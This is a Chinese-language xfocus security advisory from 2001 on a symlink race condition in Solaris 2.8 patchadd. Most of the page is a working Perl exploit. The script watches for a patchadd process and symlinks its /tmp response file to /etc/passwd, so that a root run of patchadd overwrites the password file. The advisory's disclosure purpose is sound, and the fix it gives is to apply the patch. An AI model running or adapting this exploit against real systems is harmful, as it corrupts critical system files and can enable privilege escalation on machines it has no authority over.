xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

Solaris Patchadd 符号连接漏洞exploit 代码


发布时间:2001-08-28
更新时间:2001-08-28
严重程度:
威胁程度:权限提升
错误类型:竞争条件
利用方式:服务器模式

受影响系统
Solaris 2.8 Sparc
详细描述
Solaris Patchadd是已经发现的一个漏洞,其存在符号连接漏洞,可以以执行用户身份来执行符号连接。

测试代码
<----Begin perl---------------------------------------------------------->


#!/usr/local/bin/perl
#Exploit for patchadd Solaris 2.x. Symlink /tmp file creation
#vulnerability
#patchadd creates files in /tmp with mode 644 that can be used to clobber
#system files when executed by root.
#Larry W. Cashdollar
#http://vapid.dhs.org:8080
#See BID http://www.securityfocus.com/bid/2127
#Discovery credit: Jonathan Fortin jfortin@revelex.com
#Tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc SUNW,Ultra-5_10


use strict;


my $NOISY = 1; # Do you want quiet output?
my $clobber = "/etc/passwd";


print "Listening for patchadd process...\n" if ($NOISY);


while(1) {
  open (ps,"ps -ef | grep -v grep |grep -v PID |");


while(<ps>) {
   my @args = (split " ", $_);


     if (/patch/) {
        print "Targeting PID $args[1] and symlinking response.$args[1] to
$clobber\n" if ($NOISY);
        symlink($clobber,"/tmp/response.$args[1]");
        exit(1);
      }
}


}


<----end perl---------------------------------------------------------->

解决方案
下载补丁。

相关信息
Larry
   http://vapid.dhs.org:8080